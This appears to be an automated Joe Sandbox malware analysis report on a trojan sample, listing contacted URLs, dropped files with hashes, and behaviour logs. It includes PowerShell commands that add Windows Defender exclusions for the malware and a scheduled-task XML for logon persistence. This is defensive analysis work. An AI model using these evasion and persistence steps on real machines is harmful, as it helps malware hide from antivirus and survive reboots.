http://www.safifinancial.info/op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX | 0% | Avira URL Cloud | safe
http://crl.microsoft. | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
www.kelurahanpatikidul.xyz/op9s/ | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
safifinancial.info | 34.102.136.180 | true | false | | unknown
www.safifinancial.info | unknown | unknown | true | | unknown
www.4980057280880200.xyz | unknown | unknown | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.safifinancial.info/op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX | false | Avira URL Cloud: safe | unknown
www.kelurahanpatikidul.xyz/op9s/ | true | Avira URL Cloud: safe | low

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers? | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000003.361866562.00000000052D1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.microszt | powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoft. | powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp | false | | high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.coml | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://vbcity.com/forums/t/51894.aspx | Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Ms5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.439791337.00000000048F1000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/MrCylops | Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmp | false | | high

                                                Contacted IPs


                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | safifinancial.info | United States | 15169 | GOOGLEUS | false

                                                General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 404105
Start date: 04.05.2021
Start time: 18:00:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 26s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Ms5nQdSz5l.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@19/19@2/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 9.4% (good quality ratio 8.3%)
• Quality average: 71.1%
• Quality standard deviation: 32.6%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 92.122.145.220, 52.255.188.83, 184.30.24.56, 2.20.142.210, 2.20.142.209
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
18:00:58 | API Interceptor | 2x Sleep call for process: Ms5nQdSz5l.exe modified
18:01:47 | API Interceptor | 175x Sleep call for process: powershell.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe | Refno.191938.xlsx | malicious

                                                  Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ms5nQdSz5l.exe.log
Process: C:\Users\user\Desktop\Ms5nQdSz5l.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 14734
Entropy (8bit): 4.993014478972177
Encrypted: false
SSDEEP: 384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5: 8D5E194411E038C060288366D6766D3D
SHA1: DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256: 44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512: 21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious: false
Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 22288
Entropy (8bit): 5.345016330366643
Encrypted: false
SSDEEP: 384:NtCDvh366U7TE/3ETQ0GfSvVkNI1JN8nudTdvXhiDq1dPlV36SC:Ah3w7QV0GfuxXSudriqkv
MD5: 1EBB1B5FB0B7ACC09F512DFE26626C2C
SHA1: 497DDA1C651EB4BD8B9838A379E9A2AA83BE8CA8
SHA-256: C69DE25A9D02B569E35A2DA12DA18047DE3E9B5AC89E7A29FE7C857F84D51434
SHA-512: 27F49A2DC205E89F8E5C464CA7C52F998E30B35933B9605832AC34AF999F45BD3FF13A0B7A5166278C834AD37AD36DCE4542ABDEC179454BA9D67443A6A1624A
Malicious: false
Preview: (binary data; the readable fragments are .NET assembly names such as System.Management.Automation, Microsoft.PowerShell.ConsoleHost, System.Core, System.Xml, Microsoft.Management.Infrastructure, System.Numerics, System.DirectoryServices, System.Management, System.Data, Microsoft.PowerShell.Security, System.Transactions, System.Configuration, Microsoft.PowerShell.Commands.Utility)

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ezrs2lx.0rw.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ou42d2p.ttg.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cojxddbh.ady.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezlnymm1.v0f.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mw4rjusx.4te.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taqi1ccw.3sg.psm1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\tmp7635.tmp
                                                  Process:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1651
                                                  Entropy (8bit):5.187829387108834
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBPtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3n
                                                  MD5:F535A1CF3963F9448B38B8A69C6686F9
                                                  SHA1:F31057609E3B939343C10350A6A00D69D78A794C
                                                  SHA-256:8F1062BA8F06B04A3BFD494B93BC1BE307B7EBF64855965E8BA6C39BA2071DA4
                                                  SHA-512:B5EFD180EB2C8525C8A73BBB82ADF4860EFB1225E4E9130191245A7ACBF3B02359588FBEED4C0924D5481A35DE4CBE72E1D3CFC45D5D9C205DBA1B79F975C0DF
                                                  Malicious:true
                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                  C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe
                                                  Process:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):734720
                                                  Entropy (8bit):7.525234190780704
                                                  Encrypted:false
                                                  SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                                  MD5:BA01DF16E4C876E078348FD4479A8FDF
                                                  SHA1:6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
                                                  SHA-256:8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
                                                  SHA-512:7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Joe Sandbox View:
                                                  • Filename: Refno.191938.xlsx, Detection: malicious
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                  C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe:Zone.Identifier
                                                  Process:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                  C:\Users\user\Documents\20210504\PowerShell_transcript.414408.c0oGFjmQ.20210504180103.txt
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):5767
                                                  Entropy (8bit):5.383728622337322
                                                  Encrypted:false
                                                  SSDEEP:96:BZk/jN0GqDo1Z2aZo/jN0GqDo1ZG4J+JQJjZC/jN0GqDo1Zc5JAJAJbZ8:S
                                                  MD5:76A00F68B68E479F8371D52299EA90F6
                                                  SHA1:A7848A7795C197B06CA4B8532294F850D2D33E3F
                                                  SHA-256:1BD6E89EDF41C46DDBC23A0052157BF76794E9C72C86E83959876C79D9FBF682
                                                  SHA-512:9C7D34139454DD9E1D63A1F5AA90DBE4FAA90D5FA7C0F7BE505FF126057DC04AB15543EC7B62E78C9E7E2B542168B0BA4FC648AB078ADCE54F6D21AABDD149C6
                                                  Malicious:false
                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210504180131..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Ms5nQdSz5l.exe..Process ID: 6188..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210504180132..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Ms5nQdSz5l.exe..**********************..Windows PowerShell transcript start..Start time: 20210504181059..Username: computer\user..RunAs User: computer\user..Configu
                                                  C:\Users\user\Documents\20210504\PowerShell_transcript.414408.wXuZe1kL.20210504180105.txt
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):5815
                                                  Entropy (8bit):5.407233157690023
                                                  Encrypted:false
                                                  SSDEEP:96:BZW/jNqqDo1ZbZ7/jNqqDo1ZDeI2jZ8/jNqqDo1Z+TGGdZO:N
                                                  MD5:CA8D4AA1CA34D612F4136A0BCF99E896
                                                  SHA1:F66B1CA38CD5EA53CA2FDA5D1B759ED6271B50B5
                                                  SHA-256:F656F3DB794414791EBA929B28713CC13D2D2611257E005A746729BBAD1EF66D
                                                  SHA-512:D1348AD0823A306B31D69B4EC504C3CDE49D9A15BAB832600065B925A5080E5C0CD78E060DDE46807FAE1AA429B54F26CD2A12631684D2711F4C360954E0AA32
                                                  Malicious:false
                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210504180133..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..Process ID: 6208..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210504180134..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..**********************..Windows PowerShell transcript start..Start time: 20210504180923..Username: computer\user..RunAs User: DESKTOP
                                                  C:\Users\user\Documents\20210504\PowerShell_transcript.414408.zUtNgT0P.20210504180107.txt
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):5815
                                                  Entropy (8bit):5.406659293776376
                                                  Encrypted:false
                                                  SSDEEP:96:BZy/jNmqDo1ZYZ//jNmqDo1ZteI2jZ0/jNmqDo1ZoVTGGPZE:vw
                                                  MD5:3128F27F3B23CC5B6E47AB2DE5D6EEA7
                                                  SHA1:C888FF2E9AFDD554A3BA7D920070B93405853753
                                                  SHA-256:DD91D6BD384E5ACE1F47439FE463F3EB4D03DE78A537E038A7BDEF7B6B5A8DBB
                                                  SHA-512:12C21C1680ADFC68CA91F339842F726E08436E99FDF9F1AB2BD0FBB23E64E3591B176E1633FB7DA54BDE802E097C8EE909457D4AA20B89D3F39EBE311496B02E
                                                  Malicious:false
